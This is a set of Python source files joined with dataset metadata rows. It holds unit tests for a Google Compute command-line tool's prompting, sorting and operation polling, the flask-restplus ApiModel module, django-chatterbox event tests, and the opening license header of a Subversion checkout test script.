flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'p'
command = command_base.GoogleComputeCommand('mock_command', flag_values)
command.SetFlags(flag_values)
self.assertEqual(
command._PromptForEntry(MockCollectionApi(), 'collection'),
None)
def testPromptForEntryWithOneItem(self):
class MockCollectionApi(object):
def list(self, project=None, maxResults=None, filter=None, pageToken=None):
return mock_api.MockRequest(
{'kind': 'compute#collectionList',
'id': 'projects/p/collection',
'selfLink':
'https://www.googleapis.com/compute/v1/projects/p/collection',
'items': [{'name': 'item-1'}]
})
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'p'
command = command_base.GoogleComputeCommand('mock_command', flag_values)
command.SetFlags(flag_values)
# Tests _PromptForEntry with auto selecting on.
self.assertEqual(command._PromptForEntry(MockCollectionApi(), 'collection',
auto_select=True),
{'name': 'item-1'})
# Tests _PromptForEntry with auto selecting off.
mock_output = CommandBaseTest.CaptureOutput()
mock_input = CommandBaseTest.MockInput('1\n')
oldin = sys.stdin
sys.stdin = mock_input
oldout = sys.stdout
sys.stdout = mock_output
result = command._PromptForEntry(MockCollectionApi(), 'collection',
auto_select=False)
self.assertEqual(mock_output.GetCapturedText(),
'1: item-1\n>>> ')
self.assertEqual(result, {'name': 'item-1'})
sys.stdin = oldin
sys.stdout = oldout
def testPromptForEntryWithManyItems(self):
class MockCollectionApi(object):
def list(self, project=None, maxResults=None, filter=None, pageToken=None):
return mock_api.MockRequest(
{'kind': 'compute#collectionList',
'id': 'projects/p/collection',
'selfLink':
'https://www.googleapis.com/compute/v1/projects/p/collection',
'items': [{'name': 'item-1'},
{'name': 'item-2'},
{'name': 'item-3'},
{'name': 'item-4'}]})
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'p'
command = command_base.GoogleComputeCommand('mock_command', flag_values)
command.SetFlags(flag_values)
mock_output = CommandBaseTest.CaptureOutput()
mock_input = CommandBaseTest.MockInput('3\n')
oldin = sys.stdin
sys.stdin = mock_input
oldout = sys.stdout
sys.stdout = mock_output
result = command._PromptForEntry(MockCollectionApi(), 'collection',
auto_select=False)
self.assertEqual(
mock_output.GetCapturedText(),
'\n'.join(('1: item-1', '2: item-2', '3: item-3', '4: item-4', '>>> ')))
self.assertEqual(result, {'name': 'item-3'})
sys.stdin = oldin
sys.stdout = oldout
def testPromptForEntryWithManyItemsAndAdditionalKeyFunc(self):
class MockCollectionApi(object):
def list(self, project=None, maxResults=None, filter=None,
pageToken=None):
return mock_api.MockRequest(
{'kind': 'compute#machineTypeList',
'id': 'projects/p/machineTypes',
'selfLink': ('https://www.googleapis.com/compute/v1/projects/p/'
'machineTypes'),
'items': [{'name': 'n1-highcpu-4-d'},
{'name': 'n1-standard-2'},
{'name': 'n1-standard-1-d'},
{'name': 'n1-standard-8-d'},
{'name': 'n1-highcpu-8-d'},
{'name': 'n1-standard-2-d'},
{'name': 'n1-standard-1'},
{'name': 'n1-standard-4'},
{'name': 'n1-highmem-4'},
{'name': 'n1-highcpu-4'},
{'name': 'n1-highcpu-2'},
{'name': 'n1-standard-4-d'},
{'name': 'n1-standard-8'},
{'name': 'n1-highmem-2'},
{'name': 'n1-highmem-2-d'},
{'name': 'n1-highcpu-2-d'},
{'name': 'n1-highmem-8'},
{'name': 'n1-highcpu-8'},
{'name': 'n1-highmem-8-d'},
{'name': 'n1-highmem-4-d'}]})
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'p'
command = command_base.GoogleComputeCommand('mock_command', flag_values)
command.SetFlags(flag_values)
mock_output = CommandBaseTest.CaptureOutput()
mock_input = CommandBaseTest.MockInput('3\n')
oldin = sys.stdin
sys.stdin = mock_input
oldout = sys.stdout
sys.stdout = mock_output
result = command._PromptForEntry(
MockCollectionApi(), 'machine type', auto_select=False,
additional_key_func=command._GetMachineTypeSecondarySortScore)
self.assertEqual(
mock_output.GetCapturedText(),
'\n'.join((
'1: n1-standard-1',
'2: n1-standard-1-d',
'3: n1-standard-2',
'4: n1-standard-2-d',
'5: n1-standard-4',
'6: n1-standard-4-d',
'7: n1-standard-8',
'8: n1-standard-8-d',
'9: n1-highcpu-2',
'10: n1-highcpu-2-d',
'11: n1-highcpu-4',
'12: n1-highcpu-4-d',
'13: n1-highcpu-8',
'14: n1-highcpu-8-d',
'15: n1-highmem-2',
'16: n1-highmem-2-d',
'17: n1-highmem-4',
'18: n1-highmem-4-d',
'19: n1-highmem-8',
'20: n1-highmem-8-d',
'>>> ')))
self.assertEqual(result, {'name': 'n1-standard-2'})
sys.stdin = oldin
sys.stdout = oldout
def testPromptForEntryWithDeprecatedItems(self):
class MockCollectionApi(object):
def list(self, project=None, maxResults=None, filter=None, pageToken=None):
return mock_api.MockRequest(
{'kind': 'compute#collectionList',
'id': 'projects/p/collection',
'selfLink':
'https://www.googleapis.com/compute/v1/projects/p/collection',
'items': [{'name': 'item-1',
'deprecated':
{'state': 'DEPRECATED'}},
{'name': 'item-2'},
{'name': 'item-3',
'deprecated':
{'state': 'OBSOLETE'}},
{'name': 'item-4'},
{'name': 'item-5',
'deprecated':
{'state': 'DEPRECATED'}},
{'name': 'item-6',
'deprecated':
{'state': 'DELETED'}}]})
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'p'
command = command_base.GoogleComputeCommand('mock_command', flag_values)
command.SetFlags(flag_values)
mock_output = CommandBaseTest.CaptureOutput()
mock_input = CommandBaseTest.MockInput('3\n')
oldin = sys.stdin
sys.stdin = mock_input
oldout = sys.stdout
sys.stdout = mock_output
result = command._PromptForEntry(MockCollectionApi(), 'collection',
auto_select=False)
self.assertEqual(
mock_output.GetCapturedText(),
'\n'.join(('1: item-2', '2: item-4', '3: item-1 (DEPRECATED)',
'4: item-5 (DEPRECATED)', '>>> ')))
self.assertEqual(result, {'name': 'item-1', 'deprecated':
{'state': 'DEPRECATED'}})
sys.stdin = oldin
sys.stdout = oldout
def testPromptForChoicesWithOneDeprecatedItem(self):
class MockCollectionApi(object):
def list(self, project=None, maxResults=None, filter=None, pageToken=None):
return mock_api.MockRequest(
{'kind': 'compute#collectionList',
'id': 'projects/p/collection',
'selfLink':
'https://www.googleapis.com/compute/v1/projects/p/collection',
'items': [{'name': 'item-1',
'deprecated':
{'state': 'DEPRECATED'}}]})
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'p'
command = command_base.GoogleComputeCommand('mock_command', flag_values)
command.SetFlags(flag_values)
mock_output = CommandBaseTest.CaptureOutput()
oldout = sys.stdout
sys.stdout = mock_output
result = command._PromptForEntry(MockCollectionApi(), 'collection')
self.assertEqual(
mock_output.GetCapturedText(),
'Selecting the only available collection: item-1\n')
self.assertEqual(result, {'name': 'item-1', 'deprecated':
{'state': 'DEPRECATED'}})
sys.stdout = oldout
def testDetailOutput(self):
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'user'
command = CommandBaseTest.MockDetailCommand('mock_command', flag_values)
expected_output = (u'+-------------+-------------+\n'
'| property | value |\n'
'+-------------+-------------+\n'
'| name | my-object-c |\n'
'| id | 123 |\n'
'| description | Object C |\n'
'| additional | foo |\n'
'+-------------+-------------+\n')
mock_output = mock_api.MockOutput()
oldout = sys.stdout
sys.stdout = mock_output
command.SetFlags(flag_values)
result = command.Handle()
command.PrintResult(result)
sys.stdout = oldout
self.assertEqual(mock_output.GetCapturedText(), expected_output)
def testEmptyList(self):
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'user'
class ListEmptyMockCommand(CommandBaseTest.ListMockCommand):
def __init__(self, name, flag_values):
super(ListEmptyMockCommand, self).__init__(name, flag_values)
def Handle(self):
return {'kind': 'cloud#objectsList'}
command = ListEmptyMockCommand('empty_list', flag_values)
expected_output = (u'+------+----+-------------+\n'
'| name | id | description |\n'
'+------+----+-------------+\n'
'+------+----+-------------+\n')
mock_output = mock_api.MockOutput()
oldout = sys.stdout
sys.stdout = mock_output
command.SetFlags(flag_values)
result = command.Handle()
command.PrintResult(result)
sys.stdout = oldout
self.assertEqual(mock_output.GetCapturedText(), expected_output)
def testSortingNone(self):
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'user'
command = CommandBaseTest.ListMockCommandBase('mock_command', flag_values)
expected_output = (u'+-------------+-----+-------------+\n'
'| name | id | description |\n'
'+-------------+-----+-------------+\n'
'| my-object-c | 123 | Object C |\n'
'| my-object-a | 789 | Object A |\n'
'| my-object-b | 456 | Object B |\n'
'| my-object-d | 999 | Object D |\n'
'+-------------+-----+-------------+\n')
mock_output = mock_api.MockOutput()
oldout = sys.stdout
sys.stdout = mock_output
command.SetFlags(flag_values)
result = command.Handle()
command.PrintResult(result)
sys.stdout = oldout
self.assertEqual(mock_output.GetCapturedText(), expected_output)
def testSortingDefault(self):
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'user'
command = CommandBaseTest.ListMockCommand('mock_command', flag_values)
mock_output = mock_api.MockOutput()
expected_output = (u'+-------------+-----+-------------+\n'
'| name | id | description |\n'
'+-------------+-----+-------------+\n'
'| my-object-a | 789 | Object A |\n'
'| my-object-b | 456 | Object B |\n'
'| my-object-c | 123 | Object C |\n'
'| my-object-d | 999 | Object D |\n'
'+-------------+-----+-------------+\n')
oldout = sys.stdout
sys.stdout = mock_output
command.SetFlags(flag_values)
result = command.Handle()
command.PrintResult(result)
sys.stdout = oldout
self.assertEqual(mock_output.GetCapturedText(), expected_output)
def testSortingSpecifiedInAscendingOrder(self):
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'user'
command = CommandBaseTest.ListMockCommand('mock_command', flag_values)
mock_output = mock_api.MockOutput()
flag_values.sort_by = 'id'
expected_output = (u'+-------------+-----+-------------+\n'
'| name | id | description |\n'
'+-------------+-----+-------------+\n'
'| my-object-c | 123 | Object C |\n'
'| my-object-b | 456 | Object B |\n'
'| my-object-a | 789 | Object A |\n'
'| my-object-d | 999 | Object D |\n'
'+-------------+-----+-------------+\n')
oldout = sys.stdout
sys.stdout = mock_output
command.SetFlags(flag_values)
result = command.Handle()
command.PrintResult(result)
sys.stdout = oldout
self.assertEqual(mock_output.GetCapturedText(), expected_output)
def testSortingSpecifiedInDescendingOrder(self):
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'user'
command = CommandBaseTest.ListMockCommand('mock_command', flag_values)
mock_output = mock_api.MockOutput()
flag_values.sort_by = '-id'
expected_output = (u'+-------------+-----+-------------+\n'
'| name | id | description |\n'
'+-------------+-----+-------------+\n'
'| my-object-d | 999 | Object D |\n'
'| my-object-a | 789 | Object A |\n'
'| my-object-b | 456 | Object B |\n'
'| my-object-c | 123 | Object C |\n'
'+-------------+-----+-------------+\n')
oldout = sys.stdout
sys.stdout = mock_output
command.SetFlags(flag_values)
result = command.Handle()
command.PrintResult(result)
sys.stdout = oldout
self.assertEqual(mock_output.GetCapturedText(), expected_output)
def testGracefulHandlingOfInvalidDefaultSortField(self):
class ListMockCommandWithBadDefaultSortField(
CommandBaseTest.ListMockCommandBase):
default_sort_field = 'bad-field-name'
def __init__(self, name, flag_values):
super(ListMockCommandWithBadDefaultSortField, self).__init__(
name, flag_values)
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'user'
command = ListMockCommandWithBadDefaultSortField(
'mock_command', flag_values)
# The output is expected to remain unsorted if the default sort
# field is invalid.
expected_output = (u'+-------------+-----+-------------+\n'
'| name | id | description |\n'
'+-------------+-----+-------------+\n'
'| my-object-c | 123 | Object C |\n'
'| my-object-a | 789 | Object A |\n'
'| my-object-b | 456 | Object B |\n'
'| my-object-d | 999 | Object D |\n'
'+-------------+-----+-------------+\n')
mock_output = mock_api.MockOutput()
oldout = sys.stdout
sys.stdout = mock_output
command.SetFlags(flag_values)
result = command.Handle()
command.PrintResult(result)
sys.stdout = oldout
self.assertEqual(mock_output.GetCapturedText(), expected_output)
def testVersionComparison(self):
class MockCommand(CommandBaseTest.ListMockCommand):
def __init__(self, name, flag_values):
super(MockCommand, self).__init__(name, flag_values)
flag_values = copy.deepcopy(FLAGS)
command = MockCommand('mock_command', flag_values)
command.supported_versions = ['v1beta2', 'v1beta3', 'v1beta4',
'v1beta5', 'v1beta6']
flag_values.service_version = 'v1beta4'
command.SetFlags(flag_values)
self.assertFalse(command._IsUsingAtLeastApiVersion('v1beta6'))
self.assertFalse(command._IsUsingAtLeastApiVersion('v1beta5'))
self.assertTrue(command._IsUsingAtLeastApiVersion('v1beta4'))
self.assertTrue(command._IsUsingAtLeastApiVersion('v1beta2'))
flag_values.service_version = 'v1beta6'
command.SetFlags(flag_values)
self.assertTrue(command._IsUsingAtLeastApiVersion('v1beta6'))
self.assertTrue(command._IsUsingAtLeastApiVersion('v1beta5'))
self.assertTrue(command._IsUsingAtLeastApiVersion('v1beta4'))
self.assertTrue(command._IsUsingAtLeastApiVersion('v1beta2'))
def testTracing(self):
class MockComputeApi(object):
def __init__(self, trace_calls):
self._trace_calls = trace_calls
def Disks(self):
class MockDisksApi(object):
def __init__(self, trace_calls):
self._trace_calls = trace_calls
def Insert(self, trace=None):
if trace:
self._trace_calls.append(trace)
return MockDisksApi(self._trace_calls)
# Expect no tracing if flag is not set.
trace_calls = []
compute = command_base.GoogleComputeCommand.WrapApiIfNeeded(
MockComputeApi(trace_calls))
compute.Disks().Insert()
self.assertEqual(0, len(trace_calls))
# Expect tracing if trace_token flag is set.
trace_calls = []
FLAGS.trace_token = 'THE_TOKEN'
compute = command_base.GoogleComputeCommand.WrapApiIfNeeded(
MockComputeApi(trace_calls))
compute.Disks().Insert()
self.assertEqual(1, len(trace_calls))
self.assertEqual('token:THE_TOKEN', trace_calls[0])
FLAGS.trace_token = ''
def testWaitForOperation(self):
complete_name = 'operation-complete'
running_name = 'operation-running'
pending_name = 'operation-pending'
stuck_name = 'operation-stuck'
base_operation = {'kind': 'cloud#operation',
'targetLink': ('https://www.googleapis.com/compute/'
'v1beta100/projects/p/instances/i1'),
'operationType': 'insert'}
completed_operation = dict(base_operation)
completed_operation.update({'name': complete_name,
'status': 'DONE'})
running_operation = dict(base_operation)
running_operation.update({'name': running_name,
'status': 'RUNNING'})
pending_operation = dict(base_operation)
pending_operation.update({'name': pending_name,
'status': 'PENDING'})
stuck_operation = dict(base_operation)
stuck_operation.update({'name': stuck_name,
'status': 'PENDING'})
next_operation = {complete_name: completed_operation,
running_name: completed_operation,
pending_name: running_operation,
stuck_name: stuck_operation}
class MockHttpResponse(object):
def __init__(self, status, reason):
self.status = status
self.reason = reason
class MockHttp(object):
def request(self_, url, method='GET', body=None, headers=None):
response = MockHttpResponse(200, 'OK')
data = '{ "kind": "compute#instance", "name": "i1" }'
return response, data
class MockCommand(command_base.GoogleComputeCommand):
def __init__(self, name, flag_values):
super(MockCommand, self).__init__(name, flag_values)
def SetApi(self, api):
pass
def Handle(self):
pass
def CreateHttp(self):
return MockHttp()
class MockTimer(object):
def __init__(self):
self._current_time = 0
def time(self):
return self._current_time
def sleep(self, time_to_sleep):
self._current_time += time_to_sleep
return self._current_time
class LocalMockOperationsApi(object):
def __init__(self):
self._get_call_count = 0
def GetCallCount(self):
return self._get_call_count
def get(self, project='unused project', operation='operation'):
unused_project = project
self._get_call_count += 1
return mock_api.MockRequest(next_operation[operation])
flag_values = copy.deepcopy(FLAGS)
flag_values.sleep_between_polls = 1
flag_values.max_wait_time = 30
flag_values.service_version = 'v1beta13'
flag_values.synchronous_mode = False
flag_values.project = 'test'
# Ensure a synchronous result returns immediately.
timer = MockTimer()
command = MockCommand('mock_command', flag_values)
command.SetFlags(flag_values)
command.SetApi(mock_api.MockApi())
command._global_operations_api = LocalMockOperationsApi()
diskResult = {'kind': 'cloud#disk'}
result = command.WaitForOperation(flag_values, timer, diskResult)
self.assertEqual(0, command._global_operations_api.GetCallCount())
# Ensure an asynchronous result loops until complete.
timer = MockTimer()
command = MockCommand('mock_command', flag_values)
command.SetFlags(flag_values)
command.SetApi(mock_api.MockApi())
command._global_operations_api = LocalMockOperationsApi()
result = command.WaitForOperation(flag_values, timer, pending_operation)
self.assertEqual(2, command._global_operations_api.GetCallCount())
# Ensure an asynchronous result eventually times out
timer = MockTimer()
command = MockCommand('mock_command', flag_values)
command.SetFlags(flag_values)
command.SetApi(mock_api.MockApi())
command._global_operations_api = LocalMockOperationsApi()
result = command.WaitForOperation(flag_values, timer, stuck_operation)
self.assertEqual(30, command._global_operations_api.GetCallCount())
self.assertEqual(result['status'], 'PENDING')
def testBuildComputeApi(self):
"""Ensures that building of the API from the discovery succeeds."""
flag_values = copy.deepcopy(FLAGS)
command = command_base.GoogleComputeCommand('test_cmd', flag_values)
command._BuildComputeApi(None)
def testGetZone(self):
zones = {
'zone-a': {
'kind': 'compute#zone',
'id': '1',
'creationTimestamp': '2011-07-27T20:04:06.171',
'selfLink': (
'https://googleapis.com/compute/v1/projects/p/zones/zone-a'),
'name': 'zone-a',
'description': 'Zone zone/a',
'status': 'UP'},
'zone-b': {
'kind': 'compute#zone',
'id': '2',
'creationTimestamp': '2012-01-12T00:20:42.057',
'selfLink': (
'https://googleapis.com/compute/v1/projects/p/zones/zone-b'),
'name': 'zone-b',
'description': 'Zone zone/b',
'status': 'UP',
'maintenanceWindows': [
{
'name': '2012-06-24-planned-outage',
'description': 'maintenance zone',
'beginTime': '2012-06-24T07:00:00.000',
'endTime': '2012-07-08T07:00:00.000'
}
]
}
}
class MockCommand(command_base.GoogleComputeCommand):
def __init__(self, name, flag_values):
super(MockCommand, self).__init__(name, flag_values)
def SetApi(self, api):
pass
def Handle(self):
pass
class MockZonesApi(object):
def get(self, zone, **unused_kwargs):
return mock_api.MockRequest(zones[zone])
def _PromptForZone():
return zones['zone-a']
flag_values = copy.deepcopy(FLAGS)
command = MockCommand('mock_command', flag_values)
flag_values.project = 'p'
command.SetFlags(flag_values)
command._zones_api = MockZonesApi()
command._PromptForZone = _PromptForZone
self.assertEqual(command._GetZone('zone-a'), 'zone-a')
self.assertEqual(command._GetZone('zone-b'), 'zone-b')
self.assertEqual(command._GetZone(None), 'zone-a')
def testGetNextMaintenanceStart(self):
zone = {
'kind': 'compute#zone',
'name': 'zone',
'maintenanceWindows': [
{
'name': 'january',
'beginTime': '2013-01-01T00:00:00.000',
'endTime': '2013-01-31T00:00:00.000'
},
{
'name': 'march',
'beginTime': '2013-03-01T00:00:00.000',
'endTime': '2013-03-31T00:00:00.000'
},
]
}
gnms = command_base.GoogleComputeCommand._GetNextMaintenanceStart
start = gnms(zone, datetime.datetime(2012, 12, 1))
self.assertEqual(start, datetime.datetime(2013, 1, 1))
start = gnms(zone, datetime.datetime(2013, 2, 14))
self.assertEqual(start, datetime.datetime(2013, 3, 1))
start = gnms(zone, datetime.datetime(2013, 3, 15))
self.assertEqual(start, datetime.datetime(2013, 3, 1))
def testGetZoneForResource(self):
flag_values = copy.deepcopy(FLAGS)
expected_project = 'google'
flag_values.project = expected_project
flag_values.service_version = 'v1beta13'
class MockCommand(command_base.GoogleComputeCommand):
resource_collection_name = 'foos'
def __init__(self, name, flag_values):
super(MockCommand, self).__init__(name, flag_values)
flags.DEFINE_string('zone',
None,
'Zone name.',
flag_values=flag_values)
self.params = None
def RunWithFlagsAndPositionalArgs(self, flag_values, pos_arg_values):
if self._flags != flag_values:
raise RuntimeError('Flags mismatch')
self.Handle(*pos_arg_values)
def Handle(self, param1, param2):
self.params = (param1, param2)
return None
class MockApi(object):
list_response = None
def __init__(self):
pass
def list(self, **kwargs):
self.list_parameters = kwargs
return self.list_response
class LocalMockZonesApi(object):
def list(self, project='unused project', maxResults='unused',
filter='unused'):
return mock_api.MockRequest({'items': [{'name': 'zone1'}]})
command = MockCommand('mock_command', flag_values)
command._zones_api = LocalMockZonesApi()
api = MockApi()
command.SetFlags(flag_values)
# Project-qualified name.
self.assertEqual(
command.GetZoneForResource(None, 'projects/foo/zones/bar'), 'bar')
# Special 'global' zone.
flag_values.zone = 'global'
command.SetFlags(flag_values)
self.assertEqual(
command.GetZoneForResource(None, command_base.GLOBAL_ZONE_NAME),
None)
# Zone name explicitly set.
flag_values.zone = 'explicitly-set-zone'
command.SetFlags(flag_values)
self.assertEqual(
command.GetZoneForResource(None, 'some-resource'),
'explicitly-set-zone')
def testGetUsageWithPositionalArgs(self):
class MockCommand(command_base.GoogleComputeCommand):
positional_args = '<arg-1> ... <arg-n>'
flag_values = copy.deepcopy(FLAGS)
command = MockCommand('mock_command', flag_values)
self.assertTrue(command._GetUsage().endswith(
' [--global_flags] mock_command [--command_flags] <arg-1> ... <arg-n>'))
def testGetUsageWithNoPositionalArgs(self):
class MockCommand(command_base.GoogleComputeCommand):
pass
flag_values = copy.deepcopy(FLAGS)
command = MockCommand('mock_command', flag_values)
self.assertTrue(command._GetUsage().endswith(
' [--global_flags] mock_command [--command_flags]'))
def testGoogleComputeListCommandPerZone(self):
flag_values = copy.deepcopy(FLAGS)
expected_project = 'foo'
flag_values.project = expected_project
flag_values.service_version = 'v1beta14'
object_a = {'description': 'Object A',
'id': 'projects/user/zones/a/objects/my-object-a',
'kind': 'cloud#object'}
object_b = {'description': 'Object B',
'id': 'projects/user/zones/b/objects/my-object-b',
'kind': 'cloud#object'}
list_a = {'items': [object_a],
'kind': 'cloud#objectList'}
list_b = {'items': [object_b],
'kind': 'cloud#objectList'}
list_all = {'items': [object_a, object_b],
'kind': 'cloud#objectList'}
class LocalMockZonesApi(object):
def list(self, project='unused project', maxResults='unused',
filter='unused'):
return mock_api.MockRequest({'items': [{'name': 'a'},
{'name': 'b'}]})
class ZoneListMockCommand(CommandBaseTest.ListMockCommandBase):
"""A list mock command that represents a zone-scoped collection."""
is_global_level_collection = False
is_zone_level_collection = True
def __init__(self, name, flag_values):
super(CommandBaseTest.ListMockCommandBase, self).__init__(name,
flag_values)
flags.DEFINE_string('zone',
None,
'The zone to list.',
flag_values=flag_values)
def ListZoneFunc(self):
def Func(project=None, maxResults=None, filter=None, pageToken=None,
zone=None):
if zone == 'a':
return mock_api.MockRequest(list_a)
else:
return mock_api.MockRequest(list_b)
return Func
command = ZoneListMockCommand('mock_command', flag_values)
command._zones_api = LocalMockZonesApi()
# Test single zone
flag_values.zone = 'a'
command.SetFlags(flag_values)
self.assertEqual(list_a, command.Handle())
# Test all zones
flag_values.zone = None
command.SetFlags(flag_values)
self.assertEqual(list_all, command.Handle())
def testGoogleComputeListCommandZoneAndGlobal(self):
flag_values = copy.deepcopy(FLAGS)
expected_project = 'foo'
flag_values.project = expected_project
flag_values.service_version = 'v1beta14'
object_a = {'description': 'Object A',
'id': 'projects/user/zones/a/objects/my-object-a',
'kind': 'cloud#object'}
object_b = {'description': 'Object B',
'id': 'projects/user/zones/b/objects/my-object-b',
'kind': 'cloud#object'}
object_c = {'description': 'Object C',
'id': 'projects/user/objects/my-object-c',
'kind': 'cloud#object'}
list_global = {'items': [object_c],
'kind': 'cloud#objectList'}
list_a = {'items': [object_a],
'kind': 'cloud#objectList'}
list_b = {'items': [object_b],
'kind': 'cloud#objectList'}
list_all = {'items': [object_c, object_a, object_b],
'kind': 'cloud#objectList'}
class LocalMockZonesApi(object):
def list(self, project='unused project', maxResults='unused',
filter='unused'):
return mock_api.MockRequest({'items': [{'name': 'a'},
{'name': 'b'}]})
class GlobalAndZoneListMockCommand(CommandBaseTest.ListMockCommandBase):
"""A list mock command that represents a zone-scoped collection."""
is_global_level_collection = True
is_zone_level_collection = True
def __init__(self, name, flag_values):
super(CommandBaseTest.ListMockCommandBase, self).__init__(name,
flag_values)
flags.DEFINE_string('zone',
None,
'The zone to list.',
flag_values=flag_values)
def ListZoneFunc(self):
def Func(project=None, maxResults=None, filter=None, pageToken=None,
zone=None):
if zone == 'a':
return mock_api.MockRequest(list_a)
else:
return mock_api.MockRequest(list_b)
return Func
def ListFunc(self):
def Func(project=None, maxResults=None, filter=None, pageToken=None):
return mock_api.MockRequest(list_global)
return Func
command = GlobalAndZoneListMockCommand('mock_command', flag_values)
command._zones_api = LocalMockZonesApi()
# Test single zone
flag_values.zone = 'a'
command.SetFlags(flag_values)
self.assertEqual(list_a, command.Handle())
# Test 'global' zone
flag_values.zone = 'global'
command.SetFlags(flag_values)
self.assertEqual(list_global, command.Handle())
# Test all
flag_values.zone = None
command.SetFlags(flag_values)
self.assertEqual(list_all, command.Handle())
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | 6,162,142,385,594,868,000 | 34.151423 | 81 | 0.577669 | false |
luminusnetworks/flask-restplus | flask_restplus/model.py | 1 | 3749 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import copy
import re
from collections import MutableMapping
from six import iteritems, itervalues
from werkzeug import cached_property
from flask.ext.restful import abort
from jsonschema import Draft4Validator
from jsonschema.exceptions import ValidationError
from .utils import not_none
RE_REQUIRED = re.compile(r'u?\'(?P<name>.*)\' is a required property', re.I | re.U)
def instance(cls):
if isinstance(cls, type):
return cls()
return cls
class ApiModel(dict, MutableMapping):
'''A thin wrapper on dict to store API doc metadata'''
def __init__(self, *args, **kwargs):
self.__apidoc__ = {}
self.__parent__ = None
super(ApiModel, self).__init__(*args, **kwargs)
@cached_property
def resolved(self):
'''
Resolve real fields before submitting them to upstream restful marshal
'''
# Duplicate fields
resolved = copy.deepcopy(self)
# Recursively copy parent fields if necessary
if self.__parent__:
resolved.update(self.__parent__.resolved)
# Handle discriminator
candidates = [f for f in itervalues(resolved) if getattr(f, 'discriminator', None)]
# Ensure the is only one discriminator
if len(candidates) > 1:
raise ValueError('There can only be one discriminator by schema')
# Ensure discriminator always output the model name
elif len(candidates) == 1:
candidates[0].default = self.__apidoc__['name']
return resolved
@property
def ancestors(self):
'''
Return the ancestors tree
'''
return self.__parent__.tree
@cached_property
def tree(self):
'''
Return the inheritance tree
'''
tree = [self.__apidoc__['name']]
return self.ancestors + tree if self.__parent__ else tree
@property
def name(self):
return self.__apidoc__['name']
def get_parent(self, name):
if self.name == name:
return self
elif self.__parent__:
return self.__parent__.get_parent(name)
else:
raise ValueError('Parent ' + name + ' not found')
@cached_property
def __schema__(self):
properties = {}
required = set()
discriminator = None
for name, field in iteritems(self):
field = instance(field)
properties[name] = field.__schema__
if field.required:
required.add(name)
if getattr(field, 'discriminator', False):
discriminator = name
schema = not_none({
'required': sorted(list(required)) or None,
'properties': properties,
'discriminator': discriminator,
})
if self.__parent__:
return {
'allOf': [
{'$ref': '#/definitions/{0}'.format(self.__parent__.name)},
schema
]
}
else:
return schema
def validate(self, data, resolver=None):
validator = Draft4Validator(self.__schema__, resolver=resolver)
try:
validator.validate(data)
except ValidationError:
abort(400, message='Input payload validation failed',
errors=dict(self.format_error(e) for e in validator.iter_errors(data)))
def format_error(self, error):
path = list(error.path)
if error.validator == 'required':
name = RE_REQUIRED.match(error.message).group('name')
path.append(name)
key = '.'.join(str(p) for p in path)
return key, error.message
| mit | 9,132,711,310,193,059,000 | 28.289063 | 91 | 0.572153 | false |
sthzg/django-chatterbox | chatterbox/tests/test_events.py | 1 | 3069 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.test.testcases import SimpleTestCase
from chatterbox.events import BaseChatterboxEvent
from .helpers import MailEventDummyClass, get_test_dict
class BaseChatterboxTests(SimpleTestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_add_template(self):
""" ``add_template()`` stores passed values as expected.
"""
be = BaseChatterboxEvent()
be.add_template('foo', 'chatterbox_tests/empty_foo.html')
be.add_template('bam', 'chatterbox_tests/empty_bar.html')
self.assertEqual(len(be.templates), 2)
self.assertTrue('foo' in be.templates)
self.assertTrue('bam' in be.templates)
self.assertTrue(be.templates.get('foo') == 'chatterbox_tests/empty_foo.html') # NOQA
def test_add_token(self):
""" ``add_token`` yields the expected data structure.
"""
be = BaseChatterboxEvent()
be.add_token('bam', 'baz')
be.add_token('actor.foo', 42)
be.add_token('bar.baz.boo.jap', 'jahu')
self.assertEqual(be._tokens['bam'], 'baz')
self.assertEqual(be._tokens['actor']['foo'], 42)
self.assertEqual(be._tokens['bar']['baz']['boo']['jap'], 'jahu')
def test_add_nested_token_on_leaf_raises(self):
# TODO(sthzg) implement
# be = BaseChatterboxEvent()
# be.add_token('bam', 'baz')
# be.add_token('bam.foo', 42)
pass
def test_build_tokens_with_dict(self):
""" ``build_tokens()`` resolves variables on current scope correctly.
"""
be = BaseChatterboxEvent()
be.actor = get_test_dict()
be.token_fields = ('actor.foo', 'actor.bar.eggs', 'actor.bar',)
be.build_tokens()
tokens = be._tokens
self.assertEqual(tokens['actor']['foo'], 'ham')
self.assertTrue(isinstance(tokens['actor']['bar'], dict))
self.assertEqual(tokens['actor']['bar']['juice'], False)
self.assertEqual(tokens['actor']['bar']['eggs'], True)
class ChatterboxMailEventTests(SimpleTestCase):
def setUp(self):
self.template_subject = 'chatterbox_tests/email_subject.html'
self.template_body = 'chatterbox_tests/email_body.html'
def tearDown(self):
pass
def test_class_members(self):
""" various behavioral basics work as expected. Might later be split
into smaller and more fragmented test cases.
"""
chatter = MailEventDummyClass()
self.assertEqual(chatter.originator, 'chatterbox_tests')
self.assertEqual(chatter.event, 'Stephan runs unit tests')
self.assertEqual(chatter.mail_from, '[email protected]')
self.assertEqual(chatter.mail_to, '[email protected]')
self.assertEqual(chatter.template_subject, self.template_subject)
self.assertEqual(chatter.template_body, self.template_body)
self.assertTrue('subject' in chatter.templates)
self.assertTrue('body' in chatter.templates)
| mit | -7,214,503,491,187,462,000 | 36.426829 | 93 | 0.633105 | false |
YueLinHo/Subversion | subversion/tests/cmdline/checkout_tests.py | 2 | 48298 | #!/usr/bin/env python
#
# checkout_tests.py: Testing checkout --force behavior when local
# tree already exits.
#
# Subversion is a tool for revision control.
# See http://subversion.apache.org for more information.
#
# ====================================================================
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
